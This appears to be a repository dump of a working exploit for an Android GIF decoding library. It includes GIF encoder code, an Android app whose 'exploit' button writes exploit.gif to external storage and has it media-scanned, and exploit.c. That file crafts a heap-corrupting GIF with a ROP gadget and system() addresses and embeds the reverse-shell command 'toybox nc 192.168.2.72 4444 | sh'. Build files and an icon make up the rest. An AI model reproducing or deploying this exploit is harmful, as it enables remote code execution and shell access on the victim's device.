 34 |             if (EGifBufferedOutput(Private, Private->CrntShiftDWord & 0xff) == GIF_ERROR)
 35 |                 retval = GIF_ERROR;
 36 |             Private->CrntShiftDWord >>= 8;
 37 |             Private->CrntShiftState -= 8;
 38 |         }
 39 |     }
 40 | 
 41 |     /* If code cannt fit into RunningBits bits, must raise its size. Note */
 42 |     /* however that codes above 4095 are used for special signaling.      */
 43 |     if (Private->RunningCode >= Private->MaxCode1 && Code <= 4095) {
 44 |         Private->MaxCode1 = 1 << ++Private->RunningBits;
 45 |     }
 46 | 
 47 |     return retval;
 48 | }
 49 | 
 50 | int EGifCompressLine(GifFilePrivateType *Private, unsigned char *Line, const int LineLen)
 51 | {
 52 |     int i = 0, CrntCode, NewCode;
 53 |     unsigned long NewKey;
 54 |     GifPixelType Pixel;
 55 | 
 56 |     if (Private->CrntCode == FIRST_CODE)    /* Its first time! */
 57 |         CrntCode = Line[i++];
 58 |     else
 59 |         CrntCode = Private->CrntCode;    /* Get last code in compression. */
 60 | 
 61 |     while (i < LineLen) {   /* Decode LineLen items. */
 62 |         Pixel = Line[i++];  /* Get next pixel from stream. */
 63 | 
 64 |         if (EGifCompressOutput(Private, CrntCode) == GIF_ERROR) {
 65 |             return GIF_ERROR;
 66 |         }
 67 |         CrntCode = Pixel;
 68 | 
 69 |         /* If however the HashTable if full, we send a clear first and
 70 |          * Clear the hash table.
 71 |          */
 72 |         if (Private->RunningCode >= LZ_MAX_CODE) {
 73 |             /* Time to do some clearance: */
 74 |             if (EGifCompressOutput(Private, Private->ClearCode)
 75 |                 == GIF_ERROR) {
 76 |                 return GIF_ERROR;
 77 |             }
 78 |             Private->RunningCode = Private->EOFCode + 1;
 79 |             Private->RunningBits = Private->BitsPerPixel + 1;
 80 |             Private->MaxCode1 = 1 << Private->RunningBits;
 81 |         }
 82 | 
 83 |     }
 84 | 
 85 |     /* Preserve the current state of the compression algorithm: */
 86 |     Private->CrntCode = CrntCode;
 87 | 
 88 |     if (Private->PixelCount == 0) {
 89 |         /* We are done - output last Code and flush output buffers: */
 90 |         if (EGifCompressOutput(Private, CrntCode) == GIF_ERROR) {
 91 |             return GIF_ERROR;
 92 |         }
 93 |         if (EGifCompressOutput(Private, Private->EOFCode) == GIF_ERROR) {
 94 |             return GIF_ERROR;
 95 |         }
 96 |         if (EGifCompressOutput(Private, FLUSH_OUTPUT) == GIF_ERROR) {
 97 |             return GIF_ERROR;
 98 |         }
 99 |     }
100 | 
101 |     return GIF_OK;
102 | }


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/java/com/example/myapplication/MainActivity.java:
--------------------------------------------------------------------------------
  1 | package com.example.myapplication;
  2 | 
  3 | import android.Manifest;
  4 | import android.app.Activity;
  5 | import android.content.Context;
  6 | import android.content.pm.PackageManager;
  7 | import android.content.res.AssetManager;
  8 | import android.media.MediaScannerConnection;
  9 | import android.net.Uri;
 10 | import android.os.Environment;
 11 | import android.support.v4.app.ActivityCompat;
 12 | import android.support.v7.app.AppCompatActivity;
 13 | import android.os.Bundle;
 14 | import android.util.Log;
 15 | import android.view.View;
 16 | import android.widget.Button;
 17 | 
 18 | import java.io.FileOutputStream;
 19 | import java.io.IOException;
 20 | import java.io.InputStream;
 21 | import java.io.OutputStream;
 22 | import java.io.File;
 23 | 
 24 | public class MainActivity extends AppCompatActivity {
 25 | 
 26 |     // Used to load the 'native-lib' library on application startup.
 27 |     static {
 28 |         //System.loadLibrary("native-lib");
 29 |         System.loadLibrary("pl_droidsonroids_gif");
 30 |     }
 31 | 
 32 |     // Storage Permissions
 33 |     private static final int REQUEST_EXTERNAL_STORAGE = 1;
 34 |     private static String[] PERMISSIONS_STORAGE = {
 35 |             Manifest.permission.READ_EXTERNAL_STORAGE,
 36 |             Manifest.permission.WRITE_EXTERNAL_STORAGE
 37 |     };
 38 | 
 39 |     /**
 40 |      * Checks if the app has permission to write to device storage
 41 |      *
 42 |      * If the app does not has permission then the user will be prompted to grant permissions
 43 |      *
 44 |      * @param activity
 45 |      */
 46 |     public static void verifyStoragePermissions(Activity activity) {
 47 |         // Check if we have write permission
 48 |         int permission = ActivityCompat.checkSelfPermission(activity, Manifest.permission.WRITE_EXTERNAL_STORAGE);
 49 | 
 50 |         if (permission != PackageManager.PERMISSION_GRANTED) {
 51 |             // We don't have permission so prompt the user
 52 |             ActivityCompat.requestPermissions(
 53 |                     activity,
 54 |                     PERMISSIONS_STORAGE,
 55 |                     REQUEST_EXTERNAL_STORAGE
 56 |             );
 57 |         }
 58 |     }
 59 | 
 60 |     @Override
 61 |     protected void onCreate(Bundle savedInstanceState) {
 62 |         super.onCreate(savedInstanceState);
 63 |         setContentView(R.layout.activity_main);
 64 | 
 65 |         copyAssets();
 66 |         verifyStoragePermissions(this);
 67 | 
 68 |         // Example of a call to a native method
 69 |         final Button b2 = (Button) findViewById(R.id.exploit);
 70 |         b2.setOnClickListener(new View.OnClickListener() {
 71 |             @Override
 72 |             public void onClick(View view) {
 73 |                 File sdcard = Environment.getExternalStorageDirectory();
 74 |                 FileOutputStream os = null;
 75 |                 File gif = new File(sdcard, "exploit.gif");
 76 |                 try {
 77 |                     gif.createNewFile();
 78 |                     os = new FileOutputStream(gif);
 79 |                     byte[] data = generateGif();
 80 |                     os.write(data);
 81 |                     os.close();
 82 |                 } catch (Exception e) {
 83 |                     Log.e("Test", "Exception", e);
 84 |                 }
 85 |                 final String path = gif.getAbsolutePath();
 86 |                 MediaScannerConnection.scanFile(MainActivity.this,
 87 |                         new String[] { path }, null,
 88 |                         new MediaScannerConnection.OnScanCompletedListener() {
 89 |                             @Override
 90 |                             public void onScanCompleted(String s, Uri uri) {
 91 |                                 Log.i("ExternalStorage", "Scanned " + path + " -> uri = " + uri);
 92 |                             }
 93 |                         });
 94 |             }
 95 |         });
 96 |     }
 97 | 
 98 |     private void copyAssets() {
 99 |         AssetManager assetManager = getAssets();
100 |         String[] files = null;
101 |         try {
102 |             files = assetManager.list("");
103 |         } catch (IOException e) {
104 |             Log.e("tag", "Failed to get asset file list.", e);
105 |         }
106 |         for(String filename : files) {
107 |             try {
108 |                 InputStream in = assetManager.open(filename);
109 |                 FileOutputStream out = openFileOutput(filename, Context.MODE_PRIVATE);
110 |                 copyFile(in, out);
111 |                 in.close();
112 |                 out.flush();
113 |                 out.close();
114 |             } catch(IOException e) {
115 |                 Log.e("tag", "Failed to copy asset file: " + filename, e);
116 |             }
117 |         }
118 |     }
119 |     private void copyFile(InputStream in, OutputStream out) throws IOException {
120 |         byte[] buffer = new byte[1024];
121 |         int read;
122 |         while((read = in.read(buffer)) != -1){
123 |             out.write(buffer, 0, read);
124 |         }
125 |     }
126 | 
127 |     /**
128 |      * A native method that is implemented by the 'native-lib' native library,
129 |      * which is packaged with this application.
130 |      */
131 |     public native byte[] generateGif();
132 | }
133 | 


--------------------------------------------------------------------------------
/MyApplication2/gradlew:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env sh
  2 | 
  3 | ##############################################################################
  4 | ##
  5 | ##  Gradle start up script for UN*X
  6 | ##
  7 | ##############################################################################
  8 | 
  9 | # Attempt to set APP_HOME
 10 | # Resolve links: $0 may be a link
 11 | PRG="$0"
 12 | # Need this for relative symlinks.
 13 | while [ -h "$PRG" ] ; do
 14 |     ls=`ls -ld "$PRG"`
 15 |     link=`expr "$ls" : '.*-> \(.*\)$'`
 16 |     if expr "$link" : '/.*' > /dev/null; then
 17 |         PRG="$link"
 18 |     else
 19 |         PRG=`dirname "$PRG"`"/$link"
 20 |     fi
 21 | done
 22 | SAVED="`pwd`"
 23 | cd "`dirname \"$PRG\"`/" >/dev/null
 24 | APP_HOME="`pwd -P`"
 25 | cd "$SAVED" >/dev/null
 26 | 
 27 | APP_NAME="Gradle"
 28 | APP_BASE_NAME=`basename "$0"`
 29 | 
 30 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
 31 | DEFAULT_JVM_OPTS=""
 32 | 
 33 | # Use the maximum available, or set MAX_FD != -1 to use that value.
 34 | MAX_FD="maximum"
 35 | 
 36 | warn () {
 37 |     echo "$*"
 38 | }
 39 | 
 40 | die () {
 41 |     echo
 42 |     echo "$*"
 43 |     echo
 44 |     exit 1
 45 | }
 46 | 
 47 | # OS specific support (must be 'true' or 'false').
 48 | cygwin=false
 49 | msys=false
 50 | darwin=false
 51 | nonstop=false
 52 | case "`uname`" in
 53 |   CYGWIN* )
 54 |     cygwin=true
 55 |     ;;
 56 |   Darwin* )
 57 |     darwin=true
 58 |     ;;
 59 |   MINGW* )
 60 |     msys=true
 61 |     ;;
 62 |   NONSTOP* )
 63 |     nonstop=true
 64 |     ;;
 65 | esac
 66 | 
 67 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar
 68 | 
 69 | # Determine the Java command to use to start the JVM.
 70 | if [ -n "$JAVA_HOME" ] ; then
 71 |     if [ -x "$JAVA_HOME/jre/sh/java" ] ; then
 72 |         # IBM's JDK on AIX uses strange locations for the executables
 73 |         JAVACMD="$JAVA_HOME/jre/sh/java"
 74 |     else
 75 |         JAVACMD="$JAVA_HOME/bin/java"
 76 |     fi
 77 |     if [ ! -x "$JAVACMD" ] ; then
 78 |         die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME
 79 | 
 80 | Please set the JAVA_HOME variable in your environment to match the
 81 | location of your Java installation."
 82 |     fi
 83 | else
 84 |     JAVACMD="java"
 85 |     which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
 86 | 
 87 | Please set the JAVA_HOME variable in your environment to match the
 88 | location of your Java installation."
 89 | fi
 90 | 
 91 | # Increase the maximum file descriptors if we can.
 92 | if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then
 93 |     MAX_FD_LIMIT=`ulimit -H -n`
 94 |     if [ $? -eq 0 ] ; then
 95 |         if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then
 96 |             MAX_FD="$MAX_FD_LIMIT"
 97 |         fi
 98 |         ulimit -n $MAX_FD
 99 |         if [ $? -ne 0 ] ; then
100 |             warn "Could not set maximum file descriptor limit: $MAX_FD"
101 |         fi
102 |     else
103 |         warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT"
104 |     fi
105 | fi
106 | 
107 | # For Darwin, add options to specify how the application appears in the dock
108 | if $darwin; then
109 |     GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\""
110 | fi
111 | 
112 | # For Cygwin, switch paths to Windows format before running java
113 | if $cygwin ; then
114 |     APP_HOME=`cygpath --path --mixed "$APP_HOME"`
115 |     CLASSPATH=`cygpath --path --mixed "$CLASSPATH"`
116 |     JAVACMD=`cygpath --unix "$JAVACMD"`
117 | 
118 |     # We build the pattern for arguments to be converted via cygpath
119 |     ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null`
120 |     SEP=""
121 |     for dir in $ROOTDIRSRAW ; do
122 |         ROOTDIRS="$ROOTDIRS$SEP$dir"
123 |         SEP="|"
124 |     done
125 |     OURCYGPATTERN="(^($ROOTDIRS))"
126 |     # Add a user-defined pattern to the cygpath arguments
127 |     if [ "$GRADLE_CYGPATTERN" != "" ] ; then
128 |         OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)"
129 |     fi
130 |     # Now convert the arguments - kludge to limit ourselves to /bin/sh
131 |     i=0
132 |     for arg in "$@" ; do
133 |         CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -`
134 |         CHECK2=`echo "$arg"|egrep -c "^-"`                                 ### Determine if an option
135 | 
136 |         if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then                    ### Added a condition
137 |             eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"`
138 |         else
139 |             eval `echo args$i`="\"$arg\""
140 |         fi
141 |         i=$((i+1))
142 |     done
143 |     case $i in
144 |         (0) set -- ;;
145 |         (1) set -- "$args0" ;;
146 |         (2) set -- "$args0" "$args1" ;;
147 |         (3) set -- "$args0" "$args1" "$args2" ;;
148 |         (4) set -- "$args0" "$args1" "$args2" "$args3" ;;
149 |         (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;;
150 |         (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;;
151 |         (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;;
152 |         (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;;
153 |         (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;;
154 |     esac
155 | fi
156 | 
157 | # Escape application args
158 | save () {
159 |     for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done
160 |     echo " "
161 | }
162 | APP_ARGS=$(save "$@")
163 | 
164 | # Collect all arguments for the java command, following the shell quoting and substitution rules
165 | eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS"
166 | 
167 | # by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong
168 | if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then
169 |   cd "$(dirname "$0")"
170 | fi
171 | 
172 | exec "$JAVACMD" "$@"
173 | 


--------------------------------------------------------------------------------
/exploit.c:
--------------------------------------------------------------------------------
  1 | #include "gif_lib.h"
  2 | #include <stdio.h>
  3 | #include <fcntl.h>
  4 | #include <string.h>
  5 | 
  6 | #define ONE_BYTE_HEX_STRING_SIZE   3
  7 | static inline void
  8 | get_hex(char *buf, int buf_len, char* hex_, int hex_len, int num_col) {
  9 |     int i;
 10 |     unsigned int byte_no = 0;
 11 |     if (buf_len <= 0) {
 12 |         if (hex_len > 0) {
 13 |             hex_[0] = '\0';
 14 |         }
 15 |         return;
 16 |     }
 17 |     if(hex_len < ONE_BYTE_HEX_STRING_SIZE + 1)
 18 |         return;
 19 |     do {
 20 |         for (i = 0; ((i < num_col) && (buf_len > 0) && (hex_len > 0)); ++i ) {
 21 |             snprintf(hex_, hex_len, "%02X ", buf[byte_no++] & 0xff);
 22 |             hex_ += ONE_BYTE_HEX_STRING_SIZE;
 23 |             hex_len -=ONE_BYTE_HEX_STRING_SIZE;
 24 |             buf_len--;
 25 |         }
 26 |         if (buf_len > 1) {
 27 |             snprintf(hex_, hex_len, "\n");
 28 |             hex_ += 1;
 29 |         }
 30 |     } while ((buf_len) > 0 && (hex_len > 0));
 31 | }
 32 | 
 33 | int genLine_0(unsigned char *buffer) {
 34 | /*
 35 |     00000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 36 |     00000010: 0000 0000 0000 0000 4242 4242 4242 4242  ........BBBBBBBB
 37 |     00000020: 746f 7962 6f78 206e 6320 3139 322e 3136  toybox nc 192.16
 38 |     00000030: 382e 322e 3732 2034 3434 3420 7c20 7368  8.2.72 4444 | sh
 39 |     00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 40 |     00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 41 |     00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 42 |     00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
 43 |     00000080: 4141 4141 4141 4141 eeff                 AAAAAAAA..
 44 | 
 45 |     Over-write AAAAAAAA with address of gadget 1
 46 |     Over-write BBBBBBBB with address of system() function
 47 | 
 48 |     Gadget 1
 49 |     ldr x8, [x19, #0x18]
 50 |     add x0, x19, #0x20
 51 |     blr x8
 52 | */
 53 |     unsigned char hexData[138] = {
 54 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 55 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 56 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 57 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 58 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 59 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 60 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 61 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 62 |             0x00, 0x00, 0x00, 0x00, 0xEF, 0xBE, 0xAD, 0xDE, 0xEE, 0xFF
 63 |     };
 64 |     memcpy(buffer, hexData, sizeof(hexData));
 65 | 
 66 |     /*
 67 |     Gadget g1:
 68 |         ldr x8, [x19, #0x18]
 69 |         add x0, x19, #0x20
 70 |         blr x8
 71 |     */
 72 |     size_t g1_loc = 0x7cb81f0954;            // replace this
 73 |     memcpy(buffer + 128, &g1_loc, 8);
 74 | 
 75 |     size_t system_loc = 0x7cb602ce84;        // replace this
 76 |     memcpy(buffer + 24, &system_loc, 8);
 77 | 
 78 |     char *command = "toybox nc 192.168.2.72 4444 | sh";
 79 |     memcpy(buffer + 32, command, strlen(command));
 80 | 
 81 |     return sizeof(hexData);
 82 | };
 83 | 
 84 | int main(int argc, char *argv[]) {
 85 |     GifFilePrivateType Private = {
 86 |             .Buf[0] = 0,
 87 |             .BitsPerPixel = 8,
 88 |             .ClearCode = 256,
 89 |             .EOFCode = 257,
 90 |             .RunningCode = 258,
 91 |             .RunningBits = 9,
 92 |             .MaxCode1 = 512,
 93 |             .CrntCode = FIRST_CODE,
 94 |             .CrntShiftState = 0,
 95 |             .CrntShiftDWord = 0,
 96 |             .PixelCount = 112,
 97 |             .OutBuf = { 0 },
 98 |             .OutBufLen = 0
 99 |     };
100 |     int size = 0;
101 |     unsigned char buffer[1000] = { 0 };
102 | 
103 |     unsigned char line[500] = { 0 };
104 |     int line_size = genLine_0(line);
105 |     EGifCompressLine(&Private, line, line_size);
106 | 
107 |     unsigned char starting[48] = {
108 |             0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x18, 0x00, 0x0A, 0x00, 0xF2, 0x00, 0x00, 0x66, 0xCC, 0xCC,
109 |             0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x33, 0x99, 0x66, 0x99, 0xFF, 0xCC, 0x00, 0x00, 0x00, 0x00,
110 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x15, 0x00, 0x00, 0x08
111 |     };
112 |     unsigned char padding[2] = { 0xFF, 0xFF };
113 |     unsigned char ending[61] = {
114 |             0x2C, 0x00, 0x00, 0x00, 0x00, 0x1C, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x00, 0x00, 0x00, 0x00,
115 |             0x1C, 0x0F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
116 |             0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2C, 0x00,
117 |             0x00, 0x00, 0x00, 0x18, 0x00, 0x0A, 0x00, 0x0F, 0x00, 0x01, 0x00, 0x00, 0x3B
118 |     };
119 | 
120 |     // starting bytes
121 |     memcpy(buffer + size, starting, sizeof(starting));
122 |     size += sizeof(starting);
123 | 
124 |     // size of encoded line + padding
125 |     int tmp = Private.OutBufLen + sizeof(padding);
126 |     buffer[size++] = tmp;
127 | 
128 |     // encoded-line bytes
129 |     memcpy(buffer + size, Private.OutBuf, Private.OutBufLen);
130 |     size += Private.OutBufLen;
131 | 
132 |     // padding bytes of 0xFFs to trigger info->rewind(info);
133 |     memcpy(buffer + size, padding, sizeof(padding));
134 |     size += sizeof(padding);
135 | 
136 |     // ending bytes
137 |     memcpy(buffer + size, ending, sizeof(ending));
138 |     size += sizeof(ending);
139 | 
140 |     char hex_dump[5000];
141 |     get_hex(buffer, size, hex_dump, 5000, 16);
142 |     printf("buffer = %p size = %d\n%s\n", buffer, size, hex_dump);
143 |     
144 |     int fd = open(argv[1], O_WRONLY | O_CREAT | O_TRUNC, 0644); 
145 |     write(fd, buffer, size); 
146 |     close(fd); 
147 | }
148 | 


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/drawable/ic_launcher_background.xml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <vector xmlns:android="http://schemas.android.com/apk/res/android"
  3 |     android:width="108dp"
  4 |     android:height="108dp"
  5 |     android:viewportHeight="108"
  6 |     android:viewportWidth="108">
  7 |     <path
  8 |         android:fillColor="#26A69A"
  9 |         android:pathData="M0,0h108v108h-108z" />
 10 |     <path
 11 |         android:fillColor="#00000000"
 12 |         android:pathData="M9,0L9,108"
 13 |         android:strokeColor="#33FFFFFF"
 14 |         android:strokeWidth="0.8" />
 15 |     <path
 16 |         android:fillColor="#00000000"
 17 |         android:pathData="M19,0L19,108"
 18 |         android:strokeColor="#33FFFFFF"
 19 |         android:strokeWidth="0.8" />
 20 |     <path
 21 |         android:fillColor="#00000000"
 22 |         android:pathData="M29,0L29,108"
 23 |         android:strokeColor="#33FFFFFF"
 24 |         android:strokeWidth="0.8" />
 25 |     <path
 26 |         android:fillColor="#00000000"
 27 |         android:pathData="M39,0L39,108"
 28 |         android:strokeColor="#33FFFFFF"
 29 |         android:strokeWidth="0.8" />
 30 |     <path
 31 |         android:fillColor="#00000000"
 32 |         android:pathData="M49,0L49,108"
 33 |         android:strokeColor="#33FFFFFF"
 34 |         android:strokeWidth="0.8" />
 35 |     <path
 36 |         android:fillColor="#00000000"
 37 |         android:pathData="M59,0L59,108"
 38 |         android:strokeColor="#33FFFFFF"
 39 |         android:strokeWidth="0.8" />
 40 |     <path
 41 |         android:fillColor="#00000000"
 42 |         android:pathData="M69,0L69,108"
 43 |         android:strokeColor="#33FFFFFF"
 44 |         android:strokeWidth="0.8" />
 45 |     <path
 46 |         android:fillColor="#00000000"
 47 |         android:pathData="M79,0L79,108"
 48 |         android:strokeColor="#33FFFFFF"
 49 |         android:strokeWidth="0.8" />
 50 |     <path
 51 |         android:fillColor="#00000000"
 52 |         android:pathData="M89,0L89,108"
 53 |         android:strokeColor="#33FFFFFF"
 54 |         android:strokeWidth="0.8" />
 55 |     <path
 56 |         android:fillColor="#00000000"
 57 |         android:pathData="M99,0L99,108"
 58 |         android:strokeColor="#33FFFFFF"
 59 |         android:strokeWidth="0.8" />
 60 |     <path
 61 |         android:fillColor="#00000000"
 62 |         android:pathData="M0,9L108,9"
 63 |         android:strokeColor="#33FFFFFF"
 64 |         android:strokeWidth="0.8" />
 65 |     <path
 66 |         android:fillColor="#00000000"
 67 |         android:pathData="M0,19L108,19"
 68 |         android:strokeColor="#33FFFFFF"
 69 |         android:strokeWidth="0.8" />
 70 |     <path
 71 |         android:fillColor="#00000000"
 72 |         android:pathData="M0,29L108,29"
 73 |         android:strokeColor="#33FFFFFF"
 74 |         android:strokeWidth="0.8" />
 75 |     <path
 76 |         android:fillColor="#00000000"
 77 |         android:pathData="M0,39L108,39"
 78 |         android:strokeColor="#33FFFFFF"
 79 |         android:strokeWidth="0.8" />
 80 |     <path
 81 |         android:fillColor="#00000000"
 82 |         android:pathData="M0,49L108,49"
 83 |         android:strokeColor="#33FFFFFF"
 84 |         android:strokeWidth="0.8" />
 85 |     <path
 86 |         android:fillColor="#00000000"
 87 |         android:pathData="M0,59L108,59"
 88 |         android:strokeColor="#33FFFFFF"
 89 |         android:strokeWidth="0.8" />
 90 |     <path
 91 |         android:fillColor="#00000000"
 92 |         android:pathData="M0,69L108,69"
 93 |         android:strokeColor="#33FFFFFF"
 94 |         android:strokeWidth="0.8" />
 95 |     <path
 96 |         android:fillColor="#00000000"
 97 |         android:pathData="M0,79L108,79"
 98 |         android:strokeColor="#33FFFFFF"
 99 |         android:strokeWidth="0.8" />
100 |     <path
101 |         android:fillColor="#00000000"
102 |         android:pathData="M0,89L108,89"
103 |         android:strokeColor="#33FFFFFF"
104 |         android:strokeWidth="0.8" />
105 |     <path
106 |         android:fillColor="#00000000"
107 |         android:pathData="M0,99L108,99"
108 |         android:strokeColor="#33FFFFFF"
109 |         android:strokeWidth="0.8" />
110 |     <path
111 |         android:fillColor="#00000000"
112 |         android:pathData="M19,29L89,29"
113 |         android:strokeColor="#33FFFFFF"
114 |         android:strokeWidth="0.8" />
115 |     <path
116 |         android:fillColor="#00000000"
117 |         android:pathData="M19,39L89,39"
118 |         android:strokeColor="#33FFFFFF"
119 |         android:strokeWidth="0.8" />
120 |     <path
121 |         android:fillColor="#00000000"
122 |         android:pathData="M19,49L89,49"
123 |         android:strokeColor="#33FFFFFF"
124 |         android:strokeWidth="0.8" />
125 |     <path
126 |         android:fillColor="#00000000"
127 |         android:pathData="M19,59L89,59"
128 |         android:strokeColor="#33FFFFFF"
129 |         android:strokeWidth="0.8" />
130 |     <path
131 |         android:fillColor="#00000000"
132 |         android:pathData="M19,69L89,69"
133 |         android:strokeColor="#33FFFFFF"
134 |         android:strokeWidth="0.8" />
135 |     <path
136 |         android:fillColor="#00000000"
137 |         android:pathData="M19,79L89,79"
138 |         android:strokeColor="#33FFFFFF"
139 |         android:strokeWidth="0.8" />
140 |     <path
141 |         android:fillColor="#00000000"
142 |         android:pathData="M29,19L29,89"
143 |         android:strokeColor="#33FFFFFF"
144 |         android:strokeWidth="0.8" />
145 |     <path
146 |         android:fillColor="#00000000"
147 |         android:pathData="M39,19L39,89"
148 |         android:strokeColor="#33FFFFFF"
149 |         android:strokeWidth="0.8" />
150 |     <path
151 |         android:fillColor="#00000000"
152 |         android:pathData="M49,19L49,89"
153 |         android:strokeColor="#33FFFFFF"
154 |         android:strokeWidth="0.8" />
155 |     <path
156 |         android:fillColor="#00000000"
157 |         android:pathData="M59,19L59,89"
158 |         android:strokeColor="#33FFFFFF"
159 |         android:strokeWidth="0.8" />
160 |     <path
161 |         android:fillColor="#00000000"
162 |         android:pathData="M69,19L69,89"
163 |         android:strokeColor="#33FFFFFF"
164 |         android:strokeWidth="0.8" />
165 |     <path
166 |         android:fillColor="#00000000"
167 |         android:pathData="M79,19L79,89"
168 |         android:strokeColor="#33FFFFFF"
169 |         android:strokeWidth="0.8" />
170 | </vector>
171 | 


--------------------------------------------------------------------------------
/gif_lib.h:
--------------------------------------------------------------------------------
  1 | /******************************************************************************
  2 |  
  3 | gif_lib.h - service library for decoding and encoding GIF images
  4 |                                                                              
  5 | *****************************************************************************/
  6 | 
  7 | #ifndef _GIF_LIB_H_
  8 | #define _GIF_LIB_H_ 1
  9 | 
 10 | #define GIF_ERROR   0
 11 | #define GIF_OK      1
 12 | 
 13 | #include <stddef.h>
 14 | #include <stdbool.h>
 15 | 
 16 | typedef signed char __int8_t;
 17 | typedef unsigned char __uint8_t;
 18 | typedef short __int16_t;
 19 | typedef unsigned short __uint16_t;
 20 | typedef int __int32_t;
 21 | typedef unsigned int __uint32_t;
 22 | #if defined(__LP64__)
 23 | typedef long __int64_t;
 24 | typedef unsigned long __uint64_t;
 25 | #else
 26 | typedef long long __int64_t;
 27 | typedef unsigned long long __uint64_t;
 28 | #endif
 29 | #if defined(__LP64__)
 30 | typedef long __intptr_t;
 31 | typedef unsigned long __uintptr_t;
 32 | #else
 33 | typedef int __intptr_t;
 34 | typedef unsigned int __uintptr_t;
 35 | #endif
 36 | typedef __int8_t      int8_t;
 37 | typedef __uint8_t     uint8_t;
 38 | typedef __int16_t     int16_t;
 39 | typedef __uint16_t    uint16_t;
 40 | typedef __int32_t     int32_t;
 41 | typedef __uint32_t    uint32_t;
 42 | typedef __int64_t     int64_t;
 43 | typedef __uint64_t    uint64_t;
 44 | typedef __intptr_t    intptr_t;
 45 | typedef __uintptr_t   uintptr_t;
 46 | typedef int8_t        int_least8_t;
 47 | typedef uint8_t       uint_least8_t;
 48 | typedef int16_t       int_least16_t;
 49 | typedef uint16_t      uint_least16_t;
 50 | typedef int32_t       int_least32_t;
 51 | typedef uint32_t      uint_least32_t;
 52 | typedef int64_t       int_least64_t;
 53 | typedef uint64_t      uint_least64_t;
 54 | typedef int8_t        int_fast8_t;
 55 | typedef uint8_t       uint_fast8_t;
 56 | typedef int64_t       int_fast64_t;
 57 | typedef uint64_t      uint_fast64_t;
 58 | #if defined(__LP64__)
 59 | typedef int64_t       int_fast16_t;
 60 | typedef uint64_t      uint_fast16_t;
 61 | typedef int64_t       int_fast32_t;
 62 | typedef uint64_t      uint_fast32_t;
 63 | #else
 64 | typedef int32_t       int_fast16_t;
 65 | typedef uint32_t      uint_fast16_t;
 66 | typedef int32_t       int_fast32_t;
 67 | typedef uint32_t      uint_fast32_t;
 68 | #endif
 69 | 
 70 | #define GIF_STAMP "GIFVER"          /* First chars in file - GIF stamp.  */
 71 | #define GIF_STAMP_LEN sizeof(GIF_STAMP) - 1
